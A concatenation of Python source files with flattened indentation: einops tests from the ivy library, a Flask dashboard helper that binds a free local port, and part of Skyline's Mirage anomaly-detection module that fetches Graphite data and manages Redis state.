# assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# profiler
# def test_profiler(dev, call):
#
# # ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
#
# # log dir
# this_dir = os.path.dirname(os.path.realpath(__file__))
# log_dir = os.path.join(this_dir, '../log')
#
# # with statement
# with ivy.Profiler(log_dir):
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
#
# # start and stop methods
# profiler = ivy.Profiler(log_dir)
# profiler.start()
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# profiler.stop()
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
# @pytest.mark.parametrize(
# "x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_update(x_n_new, tensor_fn, dev, call):
# x_orig, new_val = x_n_new
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# new_val = tensor_fn(new_val, 'float32', dev)
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_update(x_orig, new_val)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_decrement(x_n_dec, tensor_fn, dev, call):
# x_orig, dec = x_n_dec
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# dec = tensor_fn(dec, 'float32', dev)
# new_val = x_orig - dec
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_decrement(x_orig, dec)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_increment(x_n_inc, tensor_fn, dev, call):
# x_orig, inc = x_n_inc
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# inc = tensor_fn(inc, 'float32', dev)
# new_val = x_orig + inc
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_increment(x_orig, inc)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
|
flask_helper.py
|
# Copyright (c) Microsoft Corporation
# Licensed under the MIT License.
from flask import Flask
from .environment_detector import build_environment
from .environments.credentialed_vm_environment import CREDENTIALED_VM
from .environments.public_vm_environment import PUBLIC_VM
import socket
import threading
import atexit
import uuid
import time
from gevent.pywsgi import WSGIServer
import logging
LOCALHOST = 'localhost'
VM_ENVS = {CREDENTIALED_VM, PUBLIC_VM}
class FlaskHelper(object):
"""FlaskHelper is a class for common Flask utilities used in dashboards."""
def __init__(self, ip=None, port=None, with_credentials=False):
# The name passed to Flask needs to be unique per instance.
self.app = Flask(uuid.uuid4().hex)
self.port = port
self.ip = ip
self.with_credentials = with_credentials
# dictionary to store arbitrary state for use by consuming classes
self.shared_state = {}
if self.ip is None:
self.ip = "localhost"
if self.port is None:
# Try 100 different ports
available = False
for port in range(5000, 5100):
available = FlaskHelper._is_local_port_available(
self.ip, port, raise_error=False)
if available:
self.port = port
break
if not available:
error_message = """Ports 5000 to 5100 not available.
Please specify an open port for use via the 'port'
parameter"""
raise RuntimeError(error_message)
else:
FlaskHelper._is_local_port_available(self.ip, self.port,
raise_error=True)
self.env = build_environment(self)
if self.env.base_url is None:
return
# Sleep for 1 second in order to prevent random errors while
# socket is still closing
time.sleep(1)
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
@staticmethod
def _is_local_port_available(ip, port, raise_error=True):
"""Check whether the specified local port is available.
Borrowed from:
https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux
"""
try:
backlog = 5
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
# See stack overflow to prevent "Only one usage" random
# errors in tests:
# https://stackoverflow.com/questions/30420512/python-socket-error-only-one-usage-of-each-socket-address-is-normally-permitted
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sock.bind((LOCALHOST, port))
sock.listen(backlog)
except (socket.error, OSError): # pragma: no cover
if raise_error:
error_message = """Port {0} is not available.
Please specify another port for use via the 'port' parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
return False
return True
def run(self):
ip = LOCALHOST
# Note: for credentialed or public VM use the private IP address
if self.env_name in VM_ENVS:
host_name = socket.gethostname()
ip = socket.gethostbyname(host_name)
logger = logging.getLogger('wsgiserver')
logger.setLevel(logging.ERROR)
self.server = WSGIServer((ip, self.port), self.app, log=logger)
self.app.config["server"] = self.server
# self.app.config["CACHE_TYPE"] = "null"
self.server.serve_forever()
# Closes server on program exit, including freeing all sockets
def closeserver():
self.stop()
atexit.register(closeserver)
def stop(self):
if self.server.started:
self.server.stop()
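# A minimal usage sketch (illustrative only; the route name and port below are
# assumptions, not part of this module):
#
#   helper = FlaskHelper(ip='localhost', port=5050)
#
#   @helper.app.route('/health')
#   def health():
#       return 'ok'
#
# __init__ starts a daemon thread that serves helper.app with gevent's WSGIServer
# (unless the detected environment provides no base_url, in which case it returns
# early), so registering routes on helper.app is all a consuming dashboard needs to do.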
|
mirage.py
|
import logging
try:
from Queue import Empty
except:
from queue import Empty
# from redis import StrictRedis
from time import time, sleep
from threading import Thread
from collections import defaultdict
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list() to reduce memory and number of
# processes
# from multiprocessing import Process, Manager, Queue
from multiprocessing import Process, Queue
from msgpack import packb
from os import kill, getpid
import traceback
import re
# imports required for surfacing graphite JSON formatted timeseries for use in
# Mirage
import json
import sys
import requests
try:
import urlparse
except ImportError:
# @modified 20191113 - Branch #3262: py3
# import urllib.parse
import urllib.parse as urlparse
import os
# import errno
# import imp
from os import listdir
import datetime
import os.path
import resource
from shutil import rmtree
from ast import literal_eval
import settings
# @modified 20160922 - Branch #922: Ionosphere
# Added the send_anomalous_metric_to skyline_functions.py
from skyline_functions import (
write_data_to_file, fail_check, send_anomalous_metric_to,
mkdir_p, send_graphite_metric, filesafe_metricname,
# @added 20170603 - Feature #2034: analyse_derivatives
nonNegativeDerivative, in_list,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20201009 - Feature #3780: skyline_functions - sanitise_graphite_url
# Bug #3778: Handle single encoded forward slash requests to Graphite
sanitise_graphite_url,
# @added 20201013 - Feature #3780: skyline_functions - sanitise_graphite_url
encode_graphite_metric_name)
# @added 20200425 - Feature #3512: matched_or_regexed_in_list function
# Feature #3508: ionosphere.untrainable_metrics
# Feature #3486: analyzer_batch
from matched_or_regexed_in_list import matched_or_regexed_in_list
from mirage_alerters import trigger_alert
from negaters import trigger_negater
from mirage_algorithms import run_selected_algorithm
from algorithm_exceptions import TooShort, Stale, Boring
from os.path import join, isfile
"""
ENABLE_MEMORY_PROFILING - DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Added all the memory profiling blocks - mem_top, pympler, objgraph, gc
Garbage collection et al. should not be run in anything but development mode,
therefore these variables are hard coded and not accessible via settings.py.
If you are in here reading this then knock yourself out. gc and dump_garbage
can be useful for getting an idea about what all the objects in play are, but
garbage collection will just take longer and longer to run.
"""
LOCAL_DEBUG = False
ENABLE_MEMORY_PROFILING = False
garbage_collection_enabled = False
if ENABLE_MEMORY_PROFILING:
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# As per http://stackoverflow.com/a/1641280
# This got useable understandable data
if garbage_collection_enabled:
from gc import get_objects
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
import gc
skyline_app = 'mirage'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(sys.version_info[0])
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
try:
MIRAGE_PERIODIC_CHECK = settings.MIRAGE_PERIODIC_CHECK
except:
MIRAGE_PERIODIC_CHECK = False
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
BATCH_PROCESSING_NAMESPACES = list(settings.BATCH_PROCESSING_NAMESPACES)
except:
BATCH_PROCESSING_NAMESPACES = []
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrics have negative values so that they can be
# added to the ionosphere.untrainable_metrics Redis set
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
# from settings import KNOWN_NEGATIVE_METRICS
KNOWN_NEGATIVE_METRICS = list(settings.KNOWN_NEGATIVE_METRICS)
except:
KNOWN_NEGATIVE_METRICS = []
# @added 20200604 - Mirage - populate_redis
try:
from settings import MIRAGE_AUTOFILL_TOOSHORT
except:
MIRAGE_AUTOFILL_TOOSHORT = False
# @added 20200607 - Feature #3566: custom_algorithms
try:
CUSTOM_ALGORITHMS = settings.CUSTOM_ALGORITHMS
except:
CUSTOM_ALGORITHMS = None
try:
DEBUG_CUSTOM_ALGORITHMS = settings.DEBUG_CUSTOM_ALGORITHMS
except:
DEBUG_CUSTOM_ALGORITHMS = False
# @added 20200723 - Feature #3472: ionosphere.training_data Redis set
# Feature #3566: custom_algorithms
try:
MIRAGE_ALWAYS_METRICS = list(settings.MIRAGE_ALWAYS_METRICS)
except:
MIRAGE_ALWAYS_METRICS = []
# @added 20200610 - Feature #3560: External alert config
try:
EXTERNAL_ALERTS = settings.EXTERNAL_ALERTS
except:
EXTERNAL_ALERTS = {}
if EXTERNAL_ALERTS:
from external_alert_configs import get_external_alert_configs
# @added 20200913 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
# Info #1792: Shapelet extraction
try:
SNAB_ENABLED = settings.SNAB_ENABLED
except:
SNAB_ENABLED = False
try:
SNAB_CHECKS = settings.SNAB_CHECKS.copy()
except:
SNAB_CHECKS = {}
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
mirage_snab_only_checks_redis_set = 'mirage.snab_only_checks'
# @added 20201026 - Task #3800: Handle feedback metrics in Mirage and waterfall alerts
# Handle feedback metrics in a similar style to Ionosphere
try:
SKYLINE_FEEDBACK_NAMESPACES = list(settings.SKYLINE_FEEDBACK_NAMESPACES)
except:
# Let us take a guess
try:
graphite_host = str(settings.GRAPHITE_HOST)
graphite_hostname = graphite_host.split('.', -1)[0]
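# e.g. a GRAPHITE_HOST of 'graphite.example.org' (illustrative) yields
# the namespace guess 'graphite'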
SKYLINE_FEEDBACK_NAMESPACES = [settings.SERVER_METRICS_NAME, graphite_hostname]
except:
SKYLINE_FEEDBACK_NAMESPACES = [this_host]
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
try:
MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS = settings.MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
except:
MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS = False
# @added 20210323 - Feature #3642: Anomaly type classification
try:
LUMINOSITY_CLASSIFY_ANOMALIES = settings.LUMINOSITY_CLASSIFY_ANOMALIES
except:
LUMINOSITY_CLASSIFY_ANOMALIES = False
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
failed_checks_dir = '%s_failed' % settings.MIRAGE_CHECK_PATH
# @added 20191107 - Branch #3262: py3
alert_test_file = '%s/%s_alert_test.txt' % (settings.SKYLINE_TMP_DIR, skyline_app)
class Mirage(Thread):
def __init__(self, parent_pid):
"""
Initialize the Mirage
"""
super(Mirage, self).__init__()
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Task #3032: Debug number of Python processes and memory use
# Branch #3002: docker
# Reduce amount of Manager instances that are used as each requires a
# copy of entire memory to be copied into each subprocess so this
# results in a python process per Manager instance, using as much
# memory as the parent. OK on a server, not so much in a container.
# Disabled all the Manager().list() below and replaced with Redis sets
# self.anomalous_metrics = Manager().list()
self.mirage_exceptions_q = Queue()
self.mirage_anomaly_breakdown_q = Queue()
# self.not_anomalous_metrics = Manager().list()
# self.metric_variables = Manager().list()
# self.ionosphere_metrics = Manager().list()
# self.sent_to_crucible = Manager().list()
# self.sent_to_panorama = Manager().list()
# self.sent_to_ionosphere = Manager().list()
# @added 20170603 - Feature #2034: analyse_derivatives
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Use get_redis_conn and get_redis_conn_decoded to use on Redis sets when the bytes
# types need to be decoded as utf-8 to str
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(
# password=settings.REDIS_PASSWORD,
# unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(
# unix_socket_path=settings.REDIS_SOCKET_PATH)
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
def check_if_parent_is_alive(self):
"""
Check that both the current process and the parent process are still
alive; if either is not, log a warning and exit.
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
# @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics
# Log warning
logger.warn('warning :: parent or current process dead')
exit(0)
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
def spawn_alerter_process(self, alert, metric, second_order_resolution_seconds, context, triggered_algorithms):
"""
Spawn a process to trigger an alert. This is used by smtp alerters so
that matplotlib objects are cleared down and the alerter cannot create
a memory leak in this manner, as plt.savefig keeps the object in memory
until the process terminates. Seeing as data is being surfaced and
processed in the alert_smtp context, multiprocessing the alert creation
and handling prevents any memory leaks in the parent.
# @added 20160814 - Bug #1558: Memory leak in Analyzer
# Issue #21 Memory leak in Analyzer
# https://github.com/earthgecko/skyline/issues/21
"""
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
trigger_alert(alert, metric, second_order_resolution_seconds, context, triggered_algorithms)
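# An illustrative sketch of how this is intended to be invoked (the argument
# construction is an assumption, not shown in this excerpt):
#
#   p = Process(target=self.spawn_alerter_process,
#               args=(alert, metric, second_order_resolution_seconds,
#                     context, triggered_algorithms))
#   p.start()
#   p.join()
#
# Running the alerter in a child process means any matplotlib state it creates
# is released when that process exits, so the parent cannot accumulate a leak.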
# @modified 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until):
def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until, high_res=False):
# @added 20160803 - Unescaped Graphite target - https://github.com/earthgecko/skyline/issues/20
# bug1546: Unescaped Graphite target
# @modified 20191107 - Branch #3263: py3
# Commented out colon
# new_metric_namespace = metric_name.replace(':', '\:')
# metric_namespace = new_metric_namespace.replace('(', '\(')
metric_namespace = metric_name.replace('(', '\(')
metric_name = metric_namespace.replace(')', '\)')
# @added 20201013 - Feature #3780: skyline_functions - sanitise_graphite_url
encoded_graphite_metric_name = encode_graphite_metric_name(skyline_app, metric_name)
try:
# We use absolute time so that if there is a lag in mirage the correct
# timeseries data is still surfaced relevant to the anomalous datapoint
# timestamp
if settings.GRAPHITE_PORT != '':
# @modified 20190520 - Branch #3002: docker
# Use GRAPHITE_RENDER_URI
# url = '%s://%s:%s/render/?from=%s&until=%s&target=%s&format=json' % (
# settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
# str(settings.GRAPHITE_PORT), graphite_from, graphite_until,
# metric_name)
url = '%s://%s:%s/%s/?from=%s&until=%s&target=%s&format=json' % (
settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
str(settings.GRAPHITE_PORT), settings.GRAPHITE_RENDER_URI,
# @modified 20201013 - Feature #3780: skyline_functions - sanitise_graphite_url
# graphite_from, graphite_until, metric_name)
graphite_from, graphite_until, encoded_graphite_metric_name)
else:
# @modified 20190520 - Branch #3002: docker
# Use GRAPHITE_RENDER_URI
# url = '%s://%s/render/?from=%s&until=%s&target=%s&format=json' % (
# settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
# graphite_from, graphite_until, metric_name)
url = '%s://%s/%s/?from=%s&until=%s&target=%s&format=json' % (
settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
settings.GRAPHITE_RENDER_URI, graphite_from, graphite_until,
# @modified 20201013 - Feature #3780: skyline_functions - sanitise_graphite_url
# metric_name)
encoded_graphite_metric_name)
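# With a GRAPHITE_PORT set, the resulting URL has the form (host, port and
# metric below are illustrative):
#   https://graphite.example.org:8888/render/?from=00:00_20201201&until=06:00_20201208&target=stats.cpu.user&format=json
# where 'render' comes from settings.GRAPHITE_RENDER_URI and the target has
# been passed through encode_graphite_metric_name above.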
r = requests.get(url)
js = r.json()
datapoints = js[0]['datapoints']
except:
logger.error(traceback.format_exc())
logger.error('error :: surface_graphite_metric_data :: failed to get data from Graphite')
return False
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[1]), float(datapoint[0])]
converted.append(new_datapoint)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
except: # nosec
continue
parsed = urlparse.urlparse(url)
target = urlparse.parse_qs(parsed.query)['target'][0]
metric_data_folder = str(settings.MIRAGE_DATA_FOLDER) + "/" + target
mkdir_p(metric_data_folder)
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
if high_res:
with open(metric_data_folder + "/" + target + '.high_res', 'w') as f:
f.write(json.dumps(converted))
f.close()
return True
with open(metric_data_folder + "/" + target + '.json', 'w') as f:
f.write(json.dumps(converted))
f.close()
return True
return False
# @added 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
def mirage_load_metric_vars(self, metric_vars_file):
"""
Load the metric variables for a check from a metric check variables file
:param metric_vars_file: the path and filename to the metric variables files
:type metric_vars_file: str
:return: the metric_vars list or ``False``
:rtype: list
"""
if os.path.isfile(metric_vars_file):
logger.info(
'loading metric variables from metric_check_file - %s' % (
str(metric_vars_file)))
else:
logger.error(
'error :: loading metric variables from metric_check_file - file not found - %s' % (
str(metric_vars_file)))
return False
metric_vars = []
with open(metric_vars_file) as f:
for line in f:
no_new_line = line.replace('\n', '')
no_equal_line = no_new_line.replace(' = ', ',')
array = str(no_equal_line.split(',', 1))
add_line = literal_eval(array)
metric_vars.append(add_line)
# @added 20200429 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Allow the check file to already hold a valid python list on one line
# so that a check can be added by simply echoing the debug metric_vars
# line from the log for any failed check into a new Mirage check file.
# The original pattern above is still the default; this is for check
# files added by the operator from the log or for debugging.
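# For example (illustrative values, not taken from a real check), the default
# pattern is one 'key = value' assignment per line:
#   metric = 'stats.webserver01.cpu.user'
#   value = 1.5
#   hours_to_resolve = 7
#   metric_timestamp = 1607004600
# while the alternative pattern is a single literal_eval-able list of
# [key, value] pairs on one line.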
try_literal_eval = False
if metric_vars:
if isinstance(metric_vars, list):
pass
else:
try_literal_eval = True
logger.info('metric_vars is not a list, set to try_literal_eval')
if len(metric_vars) < 2:
try_literal_eval = True
logger.info('metric_vars is not a list of lists, set to try_literal_eval')
else:
try_literal_eval = True
logger.info('metric_vars is not defined, set to try_literal_eval')
if try_literal_eval:
try:
with open(metric_vars_file) as f:
for line in f:
metric_vars = literal_eval(line)
if metric_vars:
break
except:
logger.error(traceback.format_exc())
logger.error('metric_vars not loaded with literal_eval')
metric_vars = []
string_keys = ['metric']
float_keys = ['value']
int_keys = ['hours_to_resolve', 'metric_timestamp']
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
boolean_keys = ['snab_only_check']
# @added 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms to mirage_check_file
list_keys = ['triggered_algorithms']
metric_vars_array = []
for var_array in metric_vars:
# @modified 20181023 - Feature #2618: alert_slack
# Wrapped in try except for debugging issue where the
# hours_to_resolve was interpolating to hours_to_resolve = "t"
try:
key = None
value = None
if var_array[0] in string_keys:
key = var_array[0]
_value_str = str(var_array[1]).replace("'", '')
value_str = str(_value_str).replace('"', '')
value = str(value_str)
if var_array[0] == 'metric':
metric = value
if var_array[0] in float_keys:
key = var_array[0]
_value_str = str(var_array[1]).replace("'", '')
value_str = str(_value_str).replace('"', '')
value = float(value_str)
if var_array[0] in int_keys:
key = var_array[0]
_value_str = str(var_array[1]).replace("'", '')
value_str = str(_value_str).replace('"', '')
value = int(float(value_str))
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
# Handle new snab_only_check boolean
if var_array[0] in boolean_keys:
key = var_array[0]
logger.debug(
'debug :: boolean key - key: %s, value: %s' % (
str(var_array[0]), str(var_array[1])))
if str(var_array[1]) == '"True"':
value = True
else:
value = False
# @added 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms to mirage_check_file
if var_array[0] in list_keys:
key = var_array[0]
logger.debug(
'debug :: list key - key: %s, value: %s' % (
str(var_array[0]), str(var_array[1])))
_value_str = str(var_array[1]).replace("'", '')
try:
value = literal_eval(var_array[1])
except Exception as e:
logger.error(
'error :: loading metric variables - failed to literal_eval list for %s, %s - %s' % (
str(key), str(var_array[1]), e))
value = []
if key:
metric_vars_array.append([key, value])
if len(metric_vars_array) == 0:
logger.error(
'error :: loading metric variables - none found in %s' % (
str(metric_vars_file)))
return False
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_vars_file))
return False
logger.info('debug :: metric_vars for %s' % str(metric))
logger.info('debug :: %s' % str(metric_vars_array))
return metric_vars_array
def dump_garbage(self):
"""
DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
show us what's the garbage about
"""
if ENABLE_MEMORY_PROFILING and garbage_collection_enabled:
# force collection
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
logger.info('debug :: GARBAGE')
try:
gc.collect()
gc_collect_ok = True
except:
logger.error('error :: gc.collect failed')
logger.error(traceback.format_exc())
gc_collect_ok = False
if gc_collect_ok:
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
logger.info('debug :: GARBAGE OBJECTS')
for x in gc.garbage:
s = str(x)
if len(s) > 80:
s = s[:80]
# print type(x), "\n ", s
try:
log_string = type(x), "\n ", s
log_string = 'unused variable for testing only'
except:
logger.error(traceback.format_exc())
logger.error('error :: print x and s')
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
logger.info(log_string)
else:
return None
# @added 20200604 - Mirage - populate_redis
def populate_redis(self, i, metric):
"""
Get FULL_DURATION data from Graphite for a metric and populate Redis
"""
# Check if it has been done via the mirage.redis_populate key
redis_populated = False
redis_populated_key = 'mirage.redis_populated.%s' % metric
try:
redis_populated = self.redis_conn_decoded.get(redis_populated_key)
except Exception as e:
logger.error(
'error :: populate_redis :: could not query cache_key - %s - %s' % (
redis_populated_key, e))
redis_populated = False
# Do not handle batch processing metrics
batch_processing_metrics = []
try:
batch_processing_metrics = list(self.redis_conn_decoded.smembers('analyzer.batch_processing_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to get analyzer.batch_processing_metrics from Redis')
batch_processing_metrics = None
if batch_processing_metrics:
if metric in batch_processing_metrics:
redis_populated = True
logger.info('populate_redis :: %s is a batch processing metric, not handling, creating Redis key %s' % (
metric, redis_populated_key))
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, int(time()))
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
if redis_populated:
logger.info('populate_redis :: the Redis key %s already exists, it has been done' % (redis_populated_key))
try:
self.redis_conn.srem('mirage.populate_redis', metric)
logger.info('populate_redis :: removed item - %s - from Redis set mirage.populate_redis' % (metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to remove item %s from Redis set mirage.populate_redis' % metric)
return
time_now = int(time())
time_from = int(time_now - settings.FULL_DURATION)
# Calculate graphite from and until parameters from the metric timestamp
